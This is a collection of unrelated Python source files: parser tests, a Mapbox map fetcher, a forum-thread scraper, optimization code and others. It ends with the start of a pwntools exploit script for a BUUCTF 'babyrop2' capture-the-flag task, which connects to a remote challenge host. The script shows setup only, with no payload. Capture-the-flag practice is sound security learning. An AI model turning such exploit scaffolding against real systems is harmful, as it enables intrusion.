self.assertIsInstance(cls.getattr('__name__')[0], nodes.Const)
self.assertEquals(cls.getattr('__name__')[0].value, 'YO')
self.assertEquals(len(cls.getattr('__doc__')), 1)
self.assertIsInstance(cls.getattr('__doc__')[0], nodes.Const)
self.assertEquals(cls.getattr('__doc__')[0].value, 'hehe')
self.assertEquals(len(cls.getattr('__module__')), 1)
self.assertIsInstance(cls.getattr('__module__')[0], nodes.Const)
self.assertEquals(cls.getattr('__module__')[0].value, 'data.module')
self.assertEquals(len(cls.getattr('__dict__')), 1)
self.assertRaises(NotFoundError, cls.getattr, '__mro__')
for cls in (nodes.List._proxied, nodes.Const(1)._proxied):
self.assertEquals(len(cls.getattr('__bases__')), 1)
self.assertEquals(len(cls.getattr('__name__')), 1)
self.assertEquals(len(cls.getattr('__doc__')), 1, (cls, cls.getattr('__doc__')))
self.assertEquals(cls.getattr('__doc__')[0].value, cls.doc)
self.assertEquals(len(cls.getattr('__module__')), 1)
self.assertEquals(len(cls.getattr('__dict__')), 1)
self.assertEquals(len(cls.getattr('__mro__')), 1)
def test_cls_special_attributes_2(self):
astng = abuilder.string_build('''
class A: pass
class B: pass
A.__bases__ += (B,)
''', __name__, __file__)
self.assertEquals(len(astng['A'].getattr('__bases__')), 2)
self.assertIsInstance(astng['A'].getattr('__bases__')[0], nodes.Tuple)
self.assertIsInstance(astng['A'].getattr('__bases__')[1], nodes.AssAttr)
def test_instance_special_attributes(self):
for inst in (Instance(MODULE['YO']), nodes.List(), nodes.Const(1)):
self.assertRaises(NotFoundError, inst.getattr, '__mro__')
self.assertRaises(NotFoundError, inst.getattr, '__bases__')
self.assertRaises(NotFoundError, inst.getattr, '__name__')
self.assertEquals(len(inst.getattr('__dict__')), 1)
self.assertEquals(len(inst.getattr('__doc__')), 1)
def test_navigation(self):
klass = MODULE['YO']
self.assertEquals(klass.statement(), klass)
l_sibling = klass.previous_sibling()
self.assert_(isinstance(l_sibling, nodes.Function), l_sibling)
self.assertEquals(l_sibling.name, 'global_access')
r_sibling = klass.next_sibling()
self.assertIsInstance(r_sibling, nodes.Class)
self.assertEquals(r_sibling.name, 'YOUPI')
def test_local_attr_ancestors(self):
klass2 = MODULE['YOUPI']
it = klass2.local_attr_ancestors('__init__')
anc_klass = it.next()
self.assertIsInstance(anc_klass, nodes.Class)
self.assertEquals(anc_klass.name, 'YO')
self.assertRaises(StopIteration, it.next)
it = klass2.local_attr_ancestors('method')
self.assertRaises(StopIteration, it.next)
def test_instance_attr_ancestors(self):
klass2 = MODULE['YOUPI']
it = klass2.instance_attr_ancestors('yo')
anc_klass = it.next()
self.assertIsInstance(anc_klass, nodes.Class)
self.assertEquals(anc_klass.name, 'YO')
self.assertRaises(StopIteration, it.next)
klass2 = MODULE['YOUPI']
it = klass2.instance_attr_ancestors('member')
self.assertRaises(StopIteration, it.next)
def test_methods(self):
klass2 = MODULE['YOUPI']
methods = [m.name for m in klass2.methods()]
methods.sort()
self.assertEquals(methods, ['__init__', 'class_method',
'method', 'static_method'])
methods = [m.name for m in klass2.mymethods()]
methods.sort()
self.assertEquals(methods, ['__init__', 'class_method',
'method', 'static_method'])
klass2 = MODULE2['Specialization']
methods = [m.name for m in klass2.mymethods()]
methods.sort()
self.assertEquals(methods, [])
method_locals = klass2.local_attr('method')
self.assertEquals(len(method_locals), 1)
self.assertEquals(method_locals[0].name, 'method')
self.assertRaises(NotFoundError, klass2.local_attr, 'nonexistant')
methods = [m.name for m in klass2.methods()]
methods.sort()
self.assertEquals(methods, ['__init__', 'class_method',
'method', 'static_method'])
#def test_rhs(self):
# my_dict = MODULE['MY_DICT']
# self.assertIsInstance(my_dict.rhs(), nodes.Dict)
# a = MODULE['YO']['a']
# value = a.rhs()
# self.assertIsInstance(value, nodes.Const)
# self.assertEquals(value.value, 1)
def test_ancestors(self):
klass = MODULE['YOUPI']
ancs = [a.name for a in klass.ancestors()]
self.assertEquals(ancs, ['YO'])
klass = MODULE2['Specialization']
ancs = [a.name for a in klass.ancestors()]
self.assertEquals(ancs, ['YOUPI', 'YO', 'YO'])
def test_type(self):
klass = MODULE['YOUPI']
self.assertEquals(klass.type, 'class')
klass = MODULE2['Metaclass']
self.assertEquals(klass.type, 'metaclass')
klass = MODULE2['MyException']
self.assertEquals(klass.type, 'exception')
klass = MODULE2['MyIFace']
self.assertEquals(klass.type, 'interface')
klass = MODULE2['MyError']
self.assertEquals(klass.type, 'exception')
def test_interfaces(self):
for klass, interfaces in (('Concrete0', ['MyIFace']),
('Concrete1', ['MyIFace', 'AnotherIFace']),
('Concrete2', ['MyIFace', 'AnotherIFace']),
('Concrete23', ['MyIFace', 'AnotherIFace'])):
klass = MODULE2[klass]
self.assertEquals([i.name for i in klass.interfaces()],
interfaces)
def test_concat_interfaces(self):
astng = abuilder.string_build('''
class IMachin: pass
class Correct2:
"""docstring"""
__implements__ = (IMachin,)
class BadArgument:
"""docstring"""
__implements__ = (IMachin,)
class InterfaceCanNowBeFound:
"""docstring"""
__implements__ = BadArgument.__implements__ + Correct2.__implements__
''')
self.assertEquals([i.name for i in astng['InterfaceCanNowBeFound'].interfaces()],
['IMachin'])
def test_inner_classes(self):
eee = NONREGR['Ccc']['Eee']
self.assertEquals([n.name for n in eee.ancestors()], ['Ddd', 'Aaa', 'object'])
def test_classmethod_attributes(self):
data = '''
class WebAppObject(object):
def registered(cls, application):
cls.appli = application
cls.schema = application.schema
cls.config = application.config
return cls
registered = classmethod(registered)
'''
astng = abuilder.string_build(data, __name__, __file__)
cls = astng['WebAppObject']
self.assertEquals(sorted(cls.locals.keys()),
['appli', 'config', 'registered', 'schema'])
def test_class_getattr(self):
data = '''
class WebAppObject(object):
appli = application
appli += 2
del self.appli
'''
astng = abuilder.string_build(data, __name__, __file__)
cls = astng['WebAppObject']
# test del statement not returned by getattr
self.assertEquals(len(cls.getattr('appli')), 2)
def test_instance_getattr(self):
data = '''
class WebAppObject(object):
def __init__(self, application):
self.appli = application
self.appli += 2
del self.appli
'''
astng = abuilder.string_build(data, __name__, __file__)
inst = Instance(astng['WebAppObject'])
# test del statement not returned by getattr
self.assertEquals(len(inst.getattr('appli')), 2)
def test_instance_getattr_with_class_attr(self):
data = '''
class Parent:
aa = 1
cc = 1
class Klass(Parent):
aa = 0
bb = 0
def incr(self, val):
self.cc = self.aa
if val > self.aa:
val = self.aa
if val < self.bb:
val = self.bb
self.aa += val
'''
astng = abuilder.string_build(data, __name__, __file__)
inst = Instance(astng['Klass'])
self.assertEquals(len(inst.getattr('aa')), 3, inst.getattr('aa'))
self.assertEquals(len(inst.getattr('bb')), 1, inst.getattr('bb'))
self.assertEquals(len(inst.getattr('cc')), 2, inst.getattr('cc'))
def test_getattr_method_transform(self):
data = '''
class Clazz(object):
def m1(self, value):
self.value = value
m2 = m1
def func(arg1, arg2):
"function that will be used as a method"
return arg1.value + arg2
Clazz.m3 = func
inst = Clazz()
inst.m4 = func
'''
astng = abuilder.string_build(data, __name__, __file__)
cls = astng['Clazz']
# test del statement not returned by getattr
for method in ('m1', 'm2', 'm3'):
inferred = list(cls.igetattr(method))
self.assertEquals(len(inferred), 1)
self.assertIsInstance(inferred[0], UnboundMethod)
inferred = list(Instance(cls).igetattr(method))
self.assertEquals(len(inferred), 1)
self.assertIsInstance(inferred[0], BoundMethod)
inferred = list(Instance(cls).igetattr('m4'))
self.assertEquals(len(inferred), 1)
self.assertIsInstance(inferred[0], nodes.Function)
__all__ = ('ModuleNodeTC', 'ImportNodeTC', 'FunctionNodeTC', 'ClassNodeTC')
if __name__ == '__main__':
unittest_main()
| 1.664063 | 2 |
sprint/commands/clear.py | ii-Python/Sprint | 0 | 12766812 | # Modules
import subprocess
from os import name
from ..utils.bases import BaseCommand
# Command class
class Clear(BaseCommand):
def __init__(self, core):
self.core = core
def clear(self, arguments):
# Locate our command
command = "clear"
if name == "nt":
command = "cls"
# Execute
subprocess.run([command], shell = True)
| 2.625 | 3 |
tests/spring_cloud/ribbon/spring_client_factory_test.py | haribo0915/Spring-Cloud-in-Python | 5 | 12766813 | # -*- coding: utf-8 -*-
# standard library
from unittest.mock import Mock
__author__ = "Ssu-Tsen"
__license__ = "Apache 2.0"
# standard library
# scip plugin
from ribbon.client.config.client_config import ClientConfig
from spring_cloud.ribbon.spring_client_factory import DynamicServerListLoadBalancer, SpringClientFactory
class TestSpringClientFactory:
eureka_client = Mock()
eureka_client.get_instances_by_virtual_host_name = Mock(return_value=[])
spring_client_factory = SpringClientFactory(eureka_client)
def test_get_client_config(self):
assert isinstance(self.spring_client_factory.get_client_config("1"), ClientConfig)
assert self.spring_client_factory.get_client_config("2") == self.spring_client_factory.get_client_config("2")
def test_get_load_balancer(self):
assert isinstance(self.spring_client_factory.get_load_balancer("1"), DynamicServerListLoadBalancer)
assert self.spring_client_factory.get_load_balancer("2") == self.spring_client_factory.get_load_balancer("2")
| 2.171875 | 2 |
eqDataVisLib/mapGen.py | coolgauss/usgsEarthquakeDataVis | 0 | 12766814 | import hou
class MapBoxHandler(object):
CAM_NAME = 'map_cam'
MAPBOX_TOKEN_FILE_PARMNAME = 'mapbox_token_file'
USE_PICKLED_TOKEN_PARMNAME = 'use_pickled_token'
MAPBOX_TOKEN_STR_PARMNAME = 'mapbox_token_string'
LAT_CENTER_PARMNAME = 'lat_center'
LON_CENTER_PARMNAME = 'lon_center'
ZOOM_PARMNAME = 'zoom'
RESOLUTION_PARMNAME = 'resolution'
MAPPATH_PARMNAME = 'mappath'
def __init__(self):
pass
@property
def node(self):
return hou.pwd()
def _getPickledMapboxToken(self):
import cPickle as pickle
pickledTokenPath = hou.evalParm(self.MAPBOX_TOKEN_FILE_PARMNAME)
#import os
#pickledTokenPath = os.path.join(hou.getenv('HIP'), 'pickledToken.tok')
with open(pickledTokenPath, 'r') as f:
token = pickle.load(f)
return token
def _getMapboxToken(self):
if hou.evalParm(self.USE_PICKLED_TOKEN_PARMNAME):
return self._getPickledMapboxToken()
return hou.evalParm(self.MAPBOX_TOKEN_STR_PARMNAME)
def _getLatCenter(self):
return hou.evalParm(self.LAT_CENTER_PARMNAME)
def _getLonCenter(self):
return hou.evalParm(self.LON_CENTER_PARMNAME)
def _getZoom(self):
return hou.evalParm(self.ZOOM_PARMNAME)
def _getResolution(self):
return hou.evalParmTuple(self.RESOLUTION_PARMNAME)
def generateMap(self):
token = self._getMapboxToken()
lat = self._getLatCenter()
lon = self._getLonCenter()
zoom = self._getZoom()
res = self._getResolution()
# XXX: Currently, we only consider the simple style map
urlPrefix = 'https://api.mapbox.com/styles/v1/mapbox/streets-v8/static'
#urlPrefix = 'https://api.mapbox.com/styles/v1/mapbox/satellite-streets-v10/static
url = '{}/{},{},{},0/{}x{}?access_token={}'.format(urlPrefix, lon, \
lat, zoom, res[0], res[1], token)
import requests
# get a world map
print 'requesting url - {}'.format(url)
res = requests.get(url, stream=True)
outmap = hou.evalParm(self.MAPPATH_PARMNAME)
with open(outmap, 'wb') as f:
f.write(res.content)
print 'wrote an image - {}'.format(outmap)
def setCurrentViewportCam(self):
import toolutils
cam = hou.node('{}/{}'.format(self.node.path(), self.CAM_NAME))
sceneViewer = toolutils.sceneViewer()
viewport = sceneViewer.curViewport()
viewport.setCamera(cam)
def refreshGlCache():
hou.hscript('glcache -c')
| 2.515625 | 3 |
python/rich/richprogress2.py | jdurbin/sandbox | 0 | 12766815 | #!/usr/bin/env python
from rich.progress import track
from rich import print
from rich.progress import Progress
from rich.table import Column
from rich.progress import Progress, BarColumn, TextColumn,TimeRemainingColumn,SpinnerColumn,TimeElapsedColumn
from rich.console import Console
filename="big.fa"
seqCount=0
num_lines = sum(1 for line in open(filename,'r'))
print("num_lines:",num_lines)
console = Console(record=True)
with Progress(
SpinnerColumn(),
TextColumn("[progress.description]{task.description}"),
BarColumn(),
TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
TimeRemainingColumn(),
TimeElapsedColumn(),
console=console,
transient=True,
) as progress:
task1 = progress.add_task("[green]Reading FASTA",total=num_lines)
with open(filename) as f:
for line in f:
progress.update(task1,advance=1)
if ">" in line:
seqCount+=1
progress.log(line.strip(),seqCount)
| 2.59375 | 3 |
data/migrations/0115_message_pending_delivery.py | SIXMON/peps | 5 | 12766816 | <filename>data/migrations/0115_message_pending_delivery.py
# Generated by Django 3.1.1 on 2020-11-19 09:14
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('data', '0114_farmer_can_send_messages'),
]
operations = [
migrations.AddField(
model_name='message',
name='pending_delivery',
field=models.BooleanField(default=False),
),
]
| 1.476563 | 1 |
find_outlier/find_the_outlier.py | yesblogger/Codewar | 0 | 12766817 | <filename>find_outlier/find_the_outlier.py
"""
created on 16/04/2017
author: <NAME>
"""
from collections import Counter as C
def find_outlier(integers):
tag = ['e', 'o']
result = [tag[i % 2] for i in integers]
count_result = C(result)
index_result = [i for i in count_result if count_result[i] == 1]
return integers[result.index(index_result[0])]
# print(find_outlier([2, 4, 0, 100, 4, 11, 2602, 36]))
| 3.421875 | 3 |
examples/plugin_example/plugin.py | pfnet/pysen | 423 | 12766818 | import dataclasses
import pathlib
import subprocess
from typing import DefaultDict, List, Sequence
import dacite
from pysen.command import CommandBase
from pysen.component import ComponentBase, RunOptions
from pysen.path import change_dir
from pysen.plugin import PluginBase
from pysen.pyproject_model import Config, PluginConfig
from pysen.reporter import Reporter
from pysen.runner_options import PathContext
from pysen.setting import SettingFile
class ShellCommand(CommandBase):
def __init__(self, name: str, base_dir: pathlib.Path, cmd: Sequence[str]) -> None:
self._name = name
self._base_dir = base_dir
self._cmd = cmd
@property
def name(self) -> str:
return self._name
def __call__(self, reporter: Reporter) -> int:
with change_dir(self._base_dir):
try:
ret = subprocess.run(self._cmd)
reporter.logger.info(f"{self._cmd} returns {ret.returncode}")
return ret.returncode
except BaseException as e:
reporter.logger.info(
f"an error occured while executing: {self._cmd}\n{e}"
)
return 255
class ShellComponent(ComponentBase):
def __init__(self, name: str, cmd: Sequence[str], targets: Sequence[str]) -> None:
self._name = name
self._cmd = cmd
self._targets = targets
@property
def name(self) -> str:
return self._name
def export_settings(
self, paths: PathContext, files: DefaultDict[str, SettingFile],
) -> None:
print(f"Called export_settings at {self._name}: do nothing")
@property
def targets(self) -> Sequence[str]:
return self._targets
def create_command(
self, target: str, paths: PathContext, options: RunOptions
) -> CommandBase:
assert target in self._targets
return ShellCommand(self._name, paths.base_dir, self._cmd)
@dataclasses.dataclass
class ShellPluginConfig:
name: str
command: List[str]
targets: List[str]
class ShellPlugin(PluginBase):
def load(
self, file_path: pathlib.Path, config_data: PluginConfig, root: Config
) -> Sequence[ComponentBase]:
assert (
config_data.config is not None
), f"{config_data.location}.config must be not None"
config = dacite.from_dict(
ShellPluginConfig, config_data.config, dacite.Config(strict=True)
)
return [ShellComponent(config.name, config.command, config.targets)]
# NOTE(igarashi): This is the entry point of a plugin method
def plugin() -> PluginBase:
return ShellPlugin()
| 2 | 2 |
Node.py | ihartb/AStar | 0 | 12766819 | class Node:
def __init__(self, x, y):
self.g = 0
self.h = 0
self.f = 0
self.parent = None
self.cost = 1
self.x = x
self.y = y
self.left_child = None
self.right_child = None
self.top_child = None
self.down_child = None
def update_h(self, goal):
self.h = abs(self.x - goal.x) + abs(self.y - goal.y)
self.f = self.h + self.g
def update_hnew(self, goalC):
self.h = goalC - self.g
self.f = self.h + self.g
def update_g(self, new_g):
self.g = new_g
self.f = new_g + self.h
def update_f(self, new_f):
self.f = new_f
def print(self):
print("(", self.x, ", ", self.y, ")")
def traverse_children(self, i):
if i == 0: return self.right_child
if i == 1: return self.left_child
if i == 2: return self.top_child
return self.down_child
| 3.765625 | 4 |
thop/utils.py | zxytim/Grid-Anchor-based-Image-Cropping-Pytorch | 0 | 12766820 | <reponame>zxytim/Grid-Anchor-based-Image-Cropping-Pytorch
def clever_format(num, format="%.2f"):
if num > 1e12:
return format % (num / 1e12) + "T"
if num > 1e9:
return format % (num / 1e9) + "G"
if num > 1e6:
return format % (num / 1e6) + "M"
if num > 1e3:
return format % (num / 1e3) + "K"
| 2.921875 | 3 |
nightson/managers/events_user_manager.py | vswamy/nightson | 0 | 12766821 | from __future__ import absolute_import
from nightson.managers.base_entity_manager import BaseEntityManager
from tornado import gen
class EventUsersManager(BaseEntityManager):
def __init__(self):
pass
def __init__(self, request):
super(EventUsersManager, self).__init__(request)
@gen.coroutine
def get_users(self):
event_id = self.get_value('event_id')
sql = ''' SELECT
Users.id,
Users.first_name,
Users.last_name,
Users.photo_url,
ST_AsGeoJson(location) AS location,
Users.location_recorded_at
FROM UsersEvents INNER JOIN Users ON Users.id = UsersEvents.user_id
WHERE event_id = {0} ; '''.format(event_id)
result = yield self.execute_sql(sql)
raise gen.Return(result)
| 2.265625 | 2 |
docs/tutorials/tmp.py | jbkinney/mave-nn | 3 | 12766822 | <reponame>jbkinney/mave-nn<gh_stars>1-10
## PACKAGE THIS FUNCTION INTO MAVENN
def split_dataset(data_df,
set_col='set',
train_set_name='training',
val_set_name='validation',
test_set_name='test'):
"""
Splits dataset into
(1) `trainval_df`: training + validation set
(2) `train_df`: test set
based on the value of the column `set_col`, which is then dropped. Also
adds a `val_set_name` column to trainval_df indicating which data is to be
reserved for validation (as opposed to gradient descent).
Parameters
----------
data_df: (pd.DataFrame)
Dataset to split
set_col: (str)
Column of data_df indicating training, validation, or test set
train_set_name: (str)
Value in data_df[set_col] indicating allocation to training set
val_set_name: (str)
Value in data_df[set_col] indicating allocation to validation set
test_set_name: (str)
Value in data_df[set_col] indicating allocation to test set
Returns
-------
trainval_df: (pd.DataFrame)
Training + validation dataset. Contains a column named `val_set_name`
indicating whether a row is allocated to the training or validation
set.
test_df: (pd.DataFrame)
Test dataset.
"""
# Specify training + validation sets
trainval_ix = data_df[set_col].isin([train_set_name, val_set_name])
trainval_df = data_df[trainval_ix].copy().reset_index(drop=True)
trainval_df.insert(loc=0,
column=val_set_name,
value=trainval_df[set_col].eq(val_set_name))
trainval_df.drop(columns=set_col, inplace=True)
# Specify test set
test_ix = data_df[set_col].eq(test_set_name)
test_df = data_df[test_ix].copy().reset_index(drop=True)
test_df.drop(columns=set_col, inplace=True)
# return
return trainval_df, test_df
| 2.9375 | 3 |
python/dataset/forumposts.py | anysql/sling | 0 | 12766823 | <filename>python/dataset/forumposts.py
# Copyright 2021 Ringgaard Research ApS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Extract posting threads from vBulletin-based fora."""
import re
import requests
import html
import urllib.parse
import sling
import sling.flags as flags
# Flags.
flags.define("--url")
flags.define("--first", type=int, default=1)
flags.define("--last", type=int, default=1)
flags.define("--db", default="vault/forum")
flags.define("--forum", default="vef")
flags.define("--images", default=False, action="store_true")
flags.define("--debug", default=False, action="store_true")
flags.parse()
# Frame store.
store = sling.Store()
n_id = store["id"]
n_name = store["name"]
n_alias = store["alias"]
n_description = store["description"]
n_media = store["media"]
n_other_name = store["P2561"]
n_described_at_url = store["P973"]
n_instance_of = store["P31"]
n_forum_post = store["Q57988118"]
n_imdb = store["P345"]
n_iafd = store["P3869"]
n_egafd = store["P8767"]
n_instagram = store["P2003"]
# Regex patterns.
link_pat = re.compile(r'<a href="showthread\.php\?[^"]+" id="thread_title_(\d+)">([^<]*)<\/a>')
comment_pat = re.compile(r'<td class="alt1" id="td_threadtitle_\d+" title="(.*)')
image_pat = re.compile(r'https?:\/\/[^ ]+\.(?:png|jpg|jpeg|gif)', re.IGNORECASE)
property_patterns = {
n_imdb: re.compile(r'https?:\/\/(?:www\.)?imdb\.com\/name\/([^\/\?]+)'),
n_iafd: re.compile(r'https?:\/\/www\.iafd\.com\/person\.rme\/perfid=(\w+)\/?'),
n_egafd: re.compile(r'https?:\//www\.egafd\.com\/actresses\/details.php\/id\/(\w\d+)'),
n_instagram: re.compile(r'https?:\/\/(?:www\.)?instagram\.com\/([^\/\?]+)')
}
# AKA prefix parsing.
aka_prefixes = [
"AKAs -",
"AKA -",
"AKA-",
"AKA-",
"AKA ",
"AKA:",
"Performer AKA",
"aka",
"a.k.a.",
"Aka:",
"Also known as:",
]
aka_delimiters = [
"|",
" - ",
" aka ",
",",
"/",
]
# Parse forum overview page.
def parse_forum_page(html):
block = []
inhdr = True
for line in html.split("\n"):
line = line.strip()
if len(line) == 0: continue
if inhdr:
if line == "<!-- show threads -->": inhdr = False
elif line == "</tr><tr>":
yield block
block.clear()
else:
block.append(line)
yield block
# Trim name.
def trim_name(name):
for delim in ["(", "[", "@"]:
delim = name.find(delim)
if delim != -1: name = name[:delim]
return name.strip(" \t.,;:")
# Split and trim list of names.
def split_names(names, delimiters):
parts = []
for d in delimiters:
if d in names:
for n in names.split(d):
n = trim_name(n)
if len(n) > 0 and n not in parts: parts.append(n)
return parts
n = trim_name(names)
if len(n) > 0: parts.append(n)
return parts
db = sling.Database(flags.arg.db)
num_threads = 0
for page in range(flags.arg.first, flags.arg.last + 1):
print("page", page)
# Fetch forum postings page.
url = flags.arg.url + "&page=" + str(page)
u = urllib.parse.urlparse(url)
baseurl = u.scheme + "://" + u.netloc
r = requests.get(url)
# Parse out each forum thread as a separate block.
for block in parse_forum_page(r.content.decode(errors="ignore")):
sticky = False
threadid = None
title = None
comment = []
incomment = False
#if flags.arg.debug: print("=== block ===\n", "\n".join(block))
# Parse posting thread info.
for line in block:
m = link_pat.match(line)
if m:
threadid = m[1]
title = m[2]
m = comment_pat.match(line)
if m:
if m[1].endswith('">'):
comment.append(m[1][:-2])
incomment = False
else:
comment.append(m[1])
incomment = True
elif incomment:
if line.endswith('">'):
comment.append(line[:-2])
incomment = False
else:
comment.append(line)
if line == "Sticky:":
sticky = True
# Skip sticky threads.
if sticky: continue
# Skip untitled threads.
if title is None: continue
# Get names and links
names = split_names(html.unescape(title), ["|", "/"])
media = []
props = {}
description = ""
for line in comment:
line = html.unescape(line)
if line.endswith("..."): line = line[:-3]
if len(line) == 0: continue
# Match image urls in comment line.
urls = image_pat.findall(line)
if len(urls) > 0:
for u in urls:
media.append(u)
line = line.replace(u, "")
continue
# Match aliases in comment line.
for aka in aka_prefixes:
if not line.startswith(aka): continue
aliases = split_names(line[len(aka):], aka_delimiters)
names.extend(aliases)
line = ""
break
# Match social links.
for prop, urlpat in property_patterns.items():
m = urlpat.match(line)
if m:
props[prop] = m[1]
line = ""
break
line = line.strip()
if len(line) > 0:
if len(description) > 0:
description += "; " + line
else:
description = line
# Output item for thread.
itemid = "/forum/" + flags.arg.forum + "/" + str(threadid)
threadurl = baseurl + "/showthread.php?t=" + str(threadid)
slots = [(n_id, itemid)]
first = True
for name in names:
if first:
slots.append((n_name, name))
else:
slots.append((n_alias, name))
slots.append((n_other_name, name))
first = False
slots.append((n_description, "forum thread"))
slots.append((n_instance_of, n_forum_post))
slots.append((n_described_at_url, threadurl))
for p, v in props.items():
slots.append((p, v))
if flags.arg.images:
for m in media:
slots.append((n_media, m))
if flags.arg.debug:
print("=========")
print("thread:", threadid)
print("url:", threadurl)
print("title:", title)
print("names:", names)
if len(media) > 0: print("media:", media)
if len(props) > 0: print("props", props)
if len(description) > 0: print(description)
else:
print("thread", threadid, ":", title)
frame = store.frame(slots)
if itemid in db:
print(itemid, "already in forum db")
else:
db[itemid] = frame.data(binary=True)
num_threads += 1
print(num_threads, "forum threads")
db.close()
| 1.898438 | 2 |
CHIMERA/optimization_utils.py | aoyandong/CHIMERA | 2 | 12766824 | """
###########################################################################
# @file optimization_utils.py
# @brief Functions for optimizing transformations and parameters.
#
# @author <NAME>
#
# @Link: https://www.cbica.upenn.edu/sbia/software/
#
# @Contact: <EMAIL>
##########################################################################
"""
import numpy as np
from numpy import transpose as Tr
def initialization(x,y,K):
np.random.seed()
D,M = x.shape
N = y.shape[1]
params = {'delta':None,'sigsq':None,'T':None,'t':None}
params['delta'] = np.ones((K,M))/K
sigsq = 0
for n in range(N):
tmp = x - y[:,n].reshape(-1,1)
sigsq = sigsq + np.sum(np.power(tmp,2))
params['sigsq'] = sigsq/D/M/N;
params['T'] = np.repeat(np.eye(D).reshape(D,D,1),K,axis=2)
params['t'] = np.random.uniform(size=(D,K))
return params
def transform( x,params ):
T = params['T']
t = params['t']
delta = params['delta']
[D,M] = x.shape
K = T.shape[2]
transformed_x = np.zeros((D,M))
Tym = np.zeros((D,M,K))
for k in range(K):
Tym[:,:,k] = np.dot(T[:,:,k], x) + t[:,k].reshape(-1,1)
for m in range(M):
tmp = np.zeros(D)
for k in range(K):
tmp = tmp + delta[k,m] * Tym[:,m,k]
transformed_x[:,m] = tmp;
return transformed_x
def transform2( x,params ):
T = params['T']
delta = params['delta']
D,M = x.shape
K = T.shape[2]
transformed_x = np.zeros((D,M))
Tym = np.zeros((D,M,K))
for k in range(K):
Tym[:,:,k] = np.dot(T[:,:,k],x)
for m in range(M):
tmp = np.zeros(D)
for k in range(K):
tmp = tmp + delta[k,m] * Tym[:,m,k]
transformed_x[:,m] = tmp
return transformed_x
def transform3( x,params ):
T = params['T']
t = params['t']
D,K = t.shape
transformed_x = np.zeros((D,K))
for k in range(K):
transformed_x[:,k] = np.dot(T[:,:,k],x) + t[:,k]
return transformed_x
def Estep(y,yd,ys,tx,xd,xs,sigsq,r,rs):
"""Expectation calculation.
"""
M = tx.shape[1]
N = y.shape[1]
#> calculate RBF kernel distance based on imaging features
D1 = np.diag(np.dot(Tr(y),y))
D2 = np.diag(np.dot(Tr(tx),tx))
Mid = 2 * np.dot(Tr(y),tx)
tmp1 = D1.reshape(-1,1).repeat(M,axis=1) - Mid + D2.reshape(1,-1).repeat(N,axis=0)
#> calculate RBF kernel distance based on covariate features
tmp2 = np.zeros(tmp1.shape)
if r != 0:
D1 = np.diag(np.dot(Tr(yd),yd))
D2 = np.diag(np.dot(Tr(xd),xd))
Mid = 2 * np.dot(Tr(yd),xd)
tmp2 = D1.reshape(-1,1).repeat(M,axis=1) - Mid + D2.reshape(1,-1).repeat(N,axis=0)
#> calculate RBF kernel distance based on set information
tmp3 = np.zeros(tmp1.shape)
if rs != 0:
D1 = np.diag(np.dot(Tr(ys),ys))
D2 = np.diag(np.dot(Tr(xs),xs))
Mid = 2 * np.dot(Tr(ys),xs)
tmp3 = D1.reshape(-1,1).repeat(M,axis=1) - Mid + D2.reshape(1,-1).repeat(N,axis=0)
#> combine distances and normlize to probability distribution
P = np.exp((-tmp1-r*tmp2-rs*tmp3)/2/sigsq)+np.finfo(np.float).tiny
P = P/np.sum(P,axis=1).reshape(-1,1)
return P
def Mstep(y,yd,ys,x,tx,xd,xs,P,params,config):
"""Mstep optimization, for different transformation import different modules
"""
if config['transform'] == 'affine':
from Mstep_affine import solve_sigsq,solve_delta,solve_T,solve_t
elif config['transform'] == 'duo':
from Mstep_duo import solve_sigsq,solve_delta,solve_T,solve_t
else:
from Mstep_trans import solve_sigsq,solve_delta,solve_T,solve_t
params['sigsq'] = solve_sigsq(y,yd,ys,tx,xd,xs,P,params,config)
params['delta'] = solve_delta(y,x,P,params)
params['T'] = solve_T(y,x,P,params,config)
params['t'] = solve_t(y,x,P,params,config)
return params
def calc_obj(x,y,xd,yd,xs,ys,P,params,config):
"""Objective function calculation
"""
lambda1 = config['lambda1']
lambda2 = config['lambda2']
r = config['r']
rs = config['rs']
K = config['K']
D,N = y.shape
M = x.shape[1]
d = 0
ds = 0
IM = np.ones((M,1))
IN = np.ones((N,1))
tx = transform(x,params)
tmp = 0
for i in range(K):
tmp = tmp + np.power(np.linalg.norm(params['T'][:,:,i]-np.eye(D),'fro'),2)
P1 = np.diag(np.dot(P,IM).flatten())
P2 = np.diag(np.dot(Tr(P),IN).flatten())
term1 = np.trace(y.dot(P1).dot(Tr(y)) - 2*y.dot(P).dot(Tr(tx)) + tx.dot(P2).dot(Tr(tx)))
term2 = 0
if r != 0:
d = xd.shape[0]
term2 = r * np.trace(yd.dot(P1).dot(Tr(yd)) - 2*yd.dot(P).dot(Tr(xd)) + xd.dot(P2).dot(Tr(xd)))
term3 = 0
if rs != 0:
ds = 1
term3 = rs * np.trace(ys.dot(P1).dot(Tr(ys)) - 2*ys.dot(P).dot(Tr(xs)) + xs.dot(P2).dot(Tr(xs)))
obj = 0.5/params['sigsq'] * ( term1 + term2 + term3 \
+ lambda1*np.power(np.linalg.norm(params['t'],'fro'),2) +lambda2*tmp) \
+ N*(D+d+ds)/2.0*np.log(params['sigsq'])
return obj
| 2.71875 | 3 |
buuctf/97-baby_rop_2/exp.py | RoderickChan/ctf_tasks | 0 | 12766825 | from pwn import *
from LibcSearcher import LibcSearcher
############################
#********修改文件名**********
############################
file_name = 'babyrop2'
port = 27150
io = -1
###########修改宏###########
DEBUG = 1
LOG_PRINT = 1
TMUX = 0
def LOG_ADDR_SUCCESS(name:str, addr:int):
'''
打印地址
name: 变量名,str
addr: 地址,int
'''
global LOG_PRINT
if LOG_PRINT:
log.success('{} ===> {}'.format(name, hex(addr)))
def LOG_SUCCESS(info):
'''
打印信息
'''
if LOG_PRINT:
log.success(info)
def Get_Str_Addr(target_addr:str):
"""
获取字符串的地址
"""
global io
return io.search(target_addr.encode()).__next__()
if DEBUG: # 本地打
io = process('./{}'.format(file_name))
if TMUX:
context.terminal = ['tmux', 'splitw', '-h']
gdb.attach(io, gdbscript='b *0x80489a\nc\n')
else: # 远程打
io = remote('node3.buuoj.cn', port)
io_elf = ELF('./{}'.format(file_name))
log.success("libc used ===> {}".format(io_elf.libc))
context.log_level = 'debug'
